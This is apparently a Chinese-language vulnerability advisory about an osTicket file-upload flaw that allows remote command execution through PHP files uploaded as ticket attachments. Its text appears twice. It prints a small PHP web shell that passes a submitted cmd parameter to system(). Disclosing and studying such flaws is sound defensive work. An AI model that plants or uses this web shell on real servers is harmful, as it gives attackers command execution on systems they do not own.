VULHUB ™

osTicket是一款基于WEB的客户服务管理程序。 osTicket的上传功能实现存在问题，远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。 用户建立一个新的ticket，然后以这个ticket上传一个文件，就可以用以下方式访问： www.example.com/osticket/attachments/ 如果用户上传的PHP文档包含如下内容： ＜?PHP echo \"＜form action = \'\'\'\'＞＜input type = \'\'text\'\' name = \'\'cmd\'\' value = \'\'$cmd\'\' size = \'\'75\'\'＞＜BR＞\"; if (!$cmd)die; system($cmd); ?＞ 就可以点击脚本在服务器上运行命令。

osTicket是一款基于WEB的客户服务管理程序。 osTicket的上传功能实现存在问题，远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。 用户建立一个新的ticket，然后以这个ticket上传一个文件，就可以用以下方式访问： www.example.com/osticket/attachments/ 如果用户上传的PHP文档包含如下内容： ＜?PHP echo \"＜form action = \'\'\'\'＞＜input type = \'\'text\'\' name = \'\'cmd\'\' value = \'\'$cmd\'\' size = \'\'75\'\'＞＜BR＞\"; if (!$cmd)die; system($cmd); ?＞ 就可以点击脚本在服务器上运行命令。